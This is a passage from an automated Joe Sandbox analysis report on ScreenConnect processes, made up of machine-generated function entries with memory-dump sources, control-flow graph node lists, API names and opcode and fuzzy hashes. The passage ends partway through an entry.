                                                                                                                                                                                                                                                          Function 007ED688 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1790197317.00000000007ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 007ED000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ed000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 7f8e32246fc64d18477481ef332439145a09441f340daf45eaa87a91b554608f
                                                                                                                                                                                                                                                          • Instruction ID: 6188d39d7e38f2033f759769ca4c72f6ea5618605129b0a36bce7e5256e59e7d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7f8e32246fc64d18477481ef332439145a09441f340daf45eaa87a91b554608f
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C12122B5505280DFCB25DF15D9C4B26BF65FB9C314F2085A9E8090B25AC33ADC56CBA2
                                                                                                                                                                                                                                                          Function 007ED683 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1790197317.00000000007ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 007ED000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ed000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: b6d9f8954513a289108155b17418e8e788e8b427863a5550f59da745f4ae8560
                                                                                                                                                                                                                                                          • Instruction ID: ea7f6572fb545b2bbc425563551cca20658a0537541d560ada5b4c6a6d42a9b5
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b6d9f8954513a289108155b17418e8e788e8b427863a5550f59da745f4ae8560
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0911E676504280CFCF16CF10D5C4B16BF72FB98314F24C5A9D8490B256C33AD85ACBA2
                                                                                                                                                                                                                                                          Function 007ED01D Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1790197317.00000000007ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 007ED000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ed000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 1adc306b009db68df9fef51e62554fb656723e7d1905514f796d124d5c261f72
                                                                                                                                                                                                                                                          • Instruction ID: 05b4ad8fcd5abd9e85d385f64fac2157ec6b26e86728f28ebdaa467b4f462032
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1adc306b009db68df9fef51e62554fb656723e7d1905514f796d124d5c261f72
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6B01F7711063809AD7308A16CD84B67BF98EF49320F1CC419EC091A186C27D9C01C6B1
                                                                                                                                                                                                                                                          Function 007ED01C Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1790197317.00000000007ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 007ED000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ed000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 180a74c129995bf68ccc3920f4cd84772416acc7982350ab323448ea6644c221
                                                                                                                                                                                                                                                          • Instruction ID: 03f265b700e9a7c37feb19bbca9b88f16ec659b23fd6eb633e5eaec964c64f00
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 180a74c129995bf68ccc3920f4cd84772416acc7982350ab323448ea6644c221
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5DF06DB1405384AEE7208A1ACD88B62FFA8EF55724F18C55AED485E286C2799C45CAB1

                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                          Execution Coverage:12.6%
                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                                                                                          Total number of Nodes:6
                                                                                                                                                                                                                                                          Total number of Limit Nodes:0

                                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                                          Function 00007FFE7E096915 Relevance: .4, Instructions: 425COMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 297 7ffe7e096915-7ffe7e096919 298 7ffe7e09691e-7ffe7e096941 297->298 303 7ffe7e096943-7ffe7e09697c 298->303 307 7ffe7e0969c6-7ffe7e0969d6 303->307 308 7ffe7e09697e-7ffe7e09699a 303->308 314 7ffe7e0969d8-7ffe7e0969da 307->314 315 7ffe7e0969dc-7ffe7e0969ea 307->315 309 7ffe7e096db9-7ffe7e096dd7 call 7ffe7e090880 * 2 308->309 310 7ffe7e0969a0-7ffe7e0969be call 7ffe7e090880 * 2 308->310 325 7ffe7e096ddd-7ffe7e096de4 309->325 326 7ffe7e096ee3-7ffe7e096eee 309->326 327 7ffe7e096c4f-7ffe7e096c6d call 7ffe7e090880 * 2 310->327 328 7ffe7e0969c4-7ffe7e0969c5 310->328 318 7ffe7e0969ed-7ffe7e096a02 314->318 315->318 330 7ffe7e096a08-7ffe7e096a2c call 7ffe7e095238 * 2 318->330 331 7ffe7e096a04-7ffe7e096a06 318->331 332 7ffe7e096de6-7ffe7e096df5 325->332 333 7ffe7e096df7-7ffe7e096df9 325->333 350 7ffe7e096c97-7ffe7e096cb5 call 7ffe7e090880 * 2 327->350 351 7ffe7e096c6f-7ffe7e096c79 327->351 328->307 335 7ffe7e096a2f-7ffe7e096a44 330->335 331->335 332->333 344 7ffe7e096dfb 332->344 337 7ffe7e096e00-7ffe7e096e24 333->337 346 7ffe7e096a46-7ffe7e096a48 335->346 347 7ffe7e096a4a-7ffe7e096a6e call 7ffe7e095238 * 2 335->347 348 7ffe7e096e26-7ffe7e096e27 337->348 349 7ffe7e096e70-7ffe7e096e74 337->349 344->337 353 7ffe7e096a71-7ffe7e096a86 346->353 347->353 348->349 349->326 369 7ffe7e096cbb-7ffe7e096cc6 350->369 370 7ffe7e096d6c-7ffe7e096d77 350->370 355 7ffe7e096c7b-7ffe7e096c8b 351->355 356 7ffe7e096c8d 351->356 367 7ffe7e096a88-7ffe7e096a8a 353->367 368 7ffe7e096a8c-7ffe7e096aaf call 7ffe7e095238 353->368 359 7ffe7e096c8f-7ffe7e096c90 355->359 356->359 359->350 371 7ffe7e096ab3-7ffe7e096ac1 367->371 368->371 377 7ffe7e096cc8-7ffe7e096cca 369->377 378 7ffe7e096ccc-7ffe7e096cdb 369->378 381 7ffe7e096d79-7ffe7e096d7b 370->381 382 7ffe7e096d7d-7ffe7e096d8c 370->382 379 7ffe7e096ac7-7ffe7e096ad5 371->379 380 7ffe7e096ac3-7ffe7e096ac5 371->380 383 7ffe7e096cde-7ffe7e096d02 377->383 378->383 384 7ffe7e096ad8-7ffe7e096af2 379->384 380->384 385 7ffe7e096d8f-7ffe7e096d91 381->385 382->385 383->370 392 7ffe7e096af9-7ffe7e096b00 384->392 385->326 387 7ffe7e096d97-7ffe7e096d9f 385->387 387->309 392->327 393 7ffe7e096b06-7ffe7e096b0d 392->393 393->327 394 7ffe7e096b13-7ffe7e096b2a 393->394 396 7ffe7e096b2c-7ffe7e096b3e 394->396 397 7ffe7e096b5f-7ffe7e096b6a 394->397 400 7ffe7e096b40-7ffe7e096b42 396->400 401 7ffe7e096b44-7ffe7e096b52 396->401 402 7ffe7e096b6c-7ffe7e096b6e 397->402 403 7ffe7e096b70-7ffe7e096b7f 397->403 404 7ffe7e096b55-7ffe7e096b58 400->404 401->404 405 7ffe7e096b82-7ffe7e096b84 402->405 403->405 404->397 408 7ffe7e096c39-7ffe7e096c41 405->408 409 7ffe7e096b8a-7ffe7e096ba1 405->409 408->327 409->408 411 7ffe7e096ba7-7ffe7e096bc4 409->411 414 7ffe7e096bc6-7ffe7e096bce 411->414 415 7ffe7e096bd0 411->415 416 7ffe7e096bd2-7ffe7e096bd4 414->416 415->416 416->408 418 7ffe7e096bd6-7ffe7e096be0 416->418 419 7ffe7e096bee-7ffe7e096bf6 418->419 420 7ffe7e096be2-7ffe7e096bec call 7ffe7e0913a0 418->420 421 7ffe7e096bf8-7ffe7e096bf9 419->421 422 7ffe7e096c24-7ffe7e096c37 call 7ffe7e095260 419->422 420->327 420->419 422->327
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1788890691.00007FFE7E090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E090000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffe7e090000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: c910dba62d5c8fc76be6abea7157b1c8cade22b63ebb4b03a680917cd4747157
                                                                                                                                                                                                                                                          • Instruction ID: c178850d529de808a491645933efbc79bee95aa65dc97f1c53a663968d3bb1e0
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c910dba62d5c8fc76be6abea7157b1c8cade22b63ebb4b03a680917cd4747157
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A7E1E236A2CA564FE7A5EB2890657B962D3EF84300F554179D0AEC72F2EE2CB8418741
                                                                                                                                                                                                                                                          Function 00007FFE7DD8366B Relevance: 1.6, APIs: 1, Instructions: 121pipeCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 151 7ffe7dd8366b-7ffe7dda5860 ConnectNamedPipe 156 7ffe7dda5868-7ffe7dda58b0 call 7ffe7dda58b1 151->156 157 7ffe7dda5862 151->157 157->156
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1786457980.00007FFE7DD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DD80000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffe7dd80000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ConnectNamedPipe
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2191148154-0
                                                                                                                                                                                                                                                          • Opcode ID: 50fced52d242719ef2a8cd01d9ef0aa0ebb8bf488c3499452f28b7ab21eb0db1
                                                                                                                                                                                                                                                          • Instruction ID: e88f7278af977cb911c5b3ca3f3aed02969f6e20a5b762a204520836e87477cf
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 50fced52d242719ef2a8cd01d9ef0aa0ebb8bf488c3499452f28b7ab21eb0db1
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 16315C31908A1C8FEB58EF98D849BEDB7F0FB94311F00826AD40DD7655DB74A8458B81
                                                                                                                                                                                                                                                          Function 00007FFE7DD83652 Relevance: 1.6, APIs: 1, Instructions: 121pipeCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 141 7ffe7dd83652-7ffe7dda5860 ConnectNamedPipe 146 7ffe7dda5868-7ffe7dda58b0 call 7ffe7dda58b1 141->146 147 7ffe7dda5862 141->147 147->146
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1786457980.00007FFE7DD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DD80000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffe7dd80000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ConnectNamedPipe
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2191148154-0
                                                                                                                                                                                                                                                          • Opcode ID: 2266b45ef6341d07cf504e2ef118bdcf752c1fe4f647ae2855a97500ffc65b2d
                                                                                                                                                                                                                                                          • Instruction ID: 2fccc90d53f13e983290894884c6ff007a9add7d8442ba263890cff89ab06a54
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2266b45ef6341d07cf504e2ef118bdcf752c1fe4f647ae2855a97500ffc65b2d
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CC316D31908A1C8FDB58EF98D849BEDB7F0FB98311F00826AD44DD7655DB70A8458B81
                                                                                                                                                                                                                                                          Function 00007FFE7DD83A92 Relevance: 1.6, APIs: 1, Instructions: 106COMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 161 7ffe7dd83a92-7ffe7dd880ef 163 7ffe7dd880f6-7ffe7dd88150 SetProcessMitigationPolicy 161->163 164 7ffe7dd88158-7ffe7dd88187 163->164 165 7ffe7dd88152 163->165 165->164
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1786457980.00007FFE7DD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DD80000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffe7dd80000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: MitigationPolicyProcess
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1088084561-0
                                                                                                                                                                                                                                                          • Opcode ID: 469541d70e4ab973cc46c4a86e54614f67ccd78e3ceab964f3c97ab48dafca75
                                                                                                                                                                                                                                                          • Instruction ID: ac2b48ed8cfd3eb60e138de0fc366a121fbc3ae8e33fa77e07db00b298b156e7
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 469541d70e4ab973cc46c4a86e54614f67ccd78e3ceab964f3c97ab48dafca75
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1F21D73191CB188FDB28AF9C984A6FA77E0EB65711F00422FE449D3651DB74B8468B91
                                                                                                                                                                                                                                                          Function 00007FFE7DD880BF Relevance: 1.6, APIs: 1, Instructions: 103COMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 167 7ffe7dd880bf-7ffe7dd88150 SetProcessMitigationPolicy 169 7ffe7dd88158-7ffe7dd88187 167->169 170 7ffe7dd88152 167->170 170->169
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1786457980.00007FFE7DD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DD80000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffe7dd80000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: MitigationPolicyProcess
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1088084561-0
                                                                                                                                                                                                                                                          • Opcode ID: a47979460bda64630ef6103d69e9093b3b55f20e70fc8cacba14cb4f0437e17b
                                                                                                                                                                                                                                                          • Instruction ID: 6f18532ffb11d8702826dea19d92a165e6f8a61feb9f02f52521547ad4690caf
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a47979460bda64630ef6103d69e9093b3b55f20e70fc8cacba14cb4f0437e17b
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7221B63191CB188FDB28EF9D9C4A5FA7BE0EB65711F00422FE449D3651DB74A8458B81
                                                                                                                                                                                                                                                          Function 00007FFE7E092905 Relevance: 1.3, Strings: 1, Instructions: 28COMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1788890691.00007FFE7E090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E090000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffe7e090000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: @*}
                                                                                                                                                                                                                                                          • API String ID: 0-170568029
                                                                                                                                                                                                                                                          • Opcode ID: f1e8e18462b3e83240b852f1497f046c675aa9e0a658322672127d6493f90bb1
                                                                                                                                                                                                                                                          • Instruction ID: 5ab1da85f76f9c69530da7368e583ef6ca127cd58bccaaabf222f78a2aa50e58
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f1e8e18462b3e83240b852f1497f046c675aa9e0a658322672127d6493f90bb1
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EEE0DF33B1C6054EF74DAF18B0023F8A3C1FB81334F00007ED08E86A93EA6AA4874381
                                                                                                                                                                                                                                                          Function 00007FFE7E09264B Relevance: 1.3, Strings: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 293 7ffe7e09264b-7ffe7e092659 294 7ffe7e092660-7ffe7e092671 293->294
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1788890691.00007FFE7E090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E090000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffe7e090000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: @*}
                                                                                                                                                                                                                                                          • API String ID: 0-170568029
                                                                                                                                                                                                                                                          • Opcode ID: fd1f29aa4b697288a2e4c6ac8d0781c829e03ac6ec2f7ab410e5db044ebb4be5
                                                                                                                                                                                                                                                          • Instruction ID: 842ebe4e5ada0300b008d2f2f013ade2a9e0cce72e63f33045cf47a811b6580a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fd1f29aa4b697288a2e4c6ac8d0781c829e03ac6ec2f7ab410e5db044ebb4be5
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 90D01230549B17CFD22ECA34C191AB13392AF44304F640A7CD0EF4B293CA3978019760
                                                                                                                                                                                                                                                          Function 00007FFE7E092889 Relevance: 1.3, Strings: 1, Instructions: 4COMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 296 7ffe7e092889-7ffe7e092891
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1788890691.00007FFE7E090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E090000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffe7e090000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: @*}
                                                                                                                                                                                                                                                          • API String ID: 0-170568029
                                                                                                                                                                                                                                                          • Opcode ID: 1b533a2102b8ffd6efef18f65206f9357d1860b14c762f997420c01a29439349
                                                                                                                                                                                                                                                          • Instruction ID: 78772ec4ac6aebe12d4cc05751ae937365454ba62788197b6bfb144a19936be2
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1b533a2102b8ffd6efef18f65206f9357d1860b14c762f997420c01a29439349
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C90041171CC0535735D41171D7115C10D37DCC00475F104CD05FC3751CF74D4051511
                                                                                                                                                                                                                                                          Function 00007FFE7E09570A Relevance: .3, Instructions: 314COMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 506 7ffe7e09570a-7ffe7e095744 call 7ffe7e090880 * 2 513 7ffe7e09574a-7ffe7e095758 506->513 514 7ffe7e0964de-7ffe7e0964f1 506->514 516 7ffe7e09575a-7ffe7e09575c 513->516 517 7ffe7e09575e-7ffe7e09576d 513->517 518 7ffe7e095770-7ffe7e095772 516->518 517->518 520 7ffe7e095778-7ffe7e095794 518->520 521 7ffe7e0958b2-7ffe7e0958b5 518->521 520->521 534 7ffe7e09579a-7ffe7e0957ac 520->534 522 7ffe7e0958bb-7ffe7e0958c6 521->522 523 7ffe7e0959f0-7ffe7e0959f7 521->523 524 7ffe7e0958c8-7ffe7e0958c9 522->524 525 7ffe7e095912-7ffe7e095916 522->525 526 7ffe7e095a87-7ffe7e095a8e 523->526 527 7ffe7e0959fd-7ffe7e095a04 523->527 524->525 525->523 529 7ffe7e095a99-7ffe7e095aac 526->529 530 7ffe7e095a90-7ffe7e095a97 526->530 527->526 531 7ffe7e095a0a-7ffe7e095a14 527->531 541 7ffe7e095abd-7ffe7e095ac5 529->541 542 7ffe7e095aae-7ffe7e095ab3 529->542 530->529 532 7ffe7e095ad6-7ffe7e095add 530->532 531->532 545 7ffe7e095a1a-7ffe7e095a22 531->545 536 7ffe7e095d41-7ffe7e095d48 532->536 537 7ffe7e095ae3-7ffe7e095aea 532->537 539 7ffe7e0957fa-7ffe7e0957fe 534->539 540 7ffe7e0957ae-7ffe7e0957af 534->540 536->514 544 7ffe7e095d4e-7ffe7e095d55 536->544 537->536 543 7ffe7e095af0-7ffe7e095af3 537->543 539->521 540->539 546 7ffe7e095acb-7ffe7e095acf 541->546 547 7ffe7e096531-7ffe7e0965c9 541->547 542->541 548 7ffe7e095afc-7ffe7e095b0a 543->548 549 7ffe7e095af5-7ffe7e095af7 543->549 544->514 550 7ffe7e095d5b-7ffe7e095d6d 544->550 545->526 546->532 558 7ffe7e095b0c 548->558 559 7ffe7e095b0e 548->559 551 7ffe7e095baa-7ffe7e095bad 549->551 552 7ffe7e095db9-7ffe7e095dbd 550->552 553 7ffe7e095d6f-7ffe7e095d70 550->553 555 7ffe7e095bb6-7ffe7e095bc4 551->555 556 7ffe7e095baf-7ffe7e095bb1 551->556 552->514 553->552 570 7ffe7e095bc6 555->570 571 7ffe7e095bc8 555->571 560 7ffe7e095c65-7ffe7e095c6b 556->560 561 7ffe7e095b10-7ffe7e095b13 558->561 559->561 563 7ffe7e095d1d-7ffe7e095d1f 560->563 564 7ffe7e095c71-7ffe7e095c73 560->564 566 7ffe7e095b1d-7ffe7e095b28 561->566 567 7ffe7e095b15-7ffe7e095b1b 561->567 563->536 569 7ffe7e095d21-7ffe7e095d29 563->569 564->563 568 7ffe7e095c79-7ffe7e095c7a 564->568 573 7ffe7e095b2a-7ffe7e095b2b 566->573 574 7ffe7e095b74-7ffe7e095b78 566->574 572 7ffe7e095b98-7ffe7e095ba8 567->572 568->563 569->536 576 7ffe7e095d2b-7ffe7e095d33 569->576 577 7ffe7e095bca-7ffe7e095bcd 570->577 571->577 572->551 573->574 574->572 576->536 578 7ffe7e095bd7-7ffe7e095be2 577->578 579 7ffe7e095bcf-7ffe7e095bd5 577->579 581 7ffe7e095c2e-7ffe7e095c32 578->581 582 7ffe7e095be4-7ffe7e095be5 578->582 580 7ffe7e095c53-7ffe7e095c63 579->580 580->560 581->580 582->581
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1788890691.00007FFE7E090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E090000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffe7e090000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 28df3ab969c3555e133f81fda0b5339bef68b74f93aff585d24384f7345192dc
                                                                                                                                                                                                                                                          • Instruction ID: 92f95ea5e244d92165caa7ceb43e777088ae4b5f1a9dda87c7f37116e3516252
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 28df3ab969c3555e133f81fda0b5339bef68b74f93aff585d24384f7345192dc
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E3A1E73692CA564FE7B5AA2990503F537D2EF85314F5901B5C8EDCB1E3DE2CB8428760
                                                                                                                                                                                                                                                          Function 00007FFE7E0901B5 Relevance: .3, Instructions: 314COMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
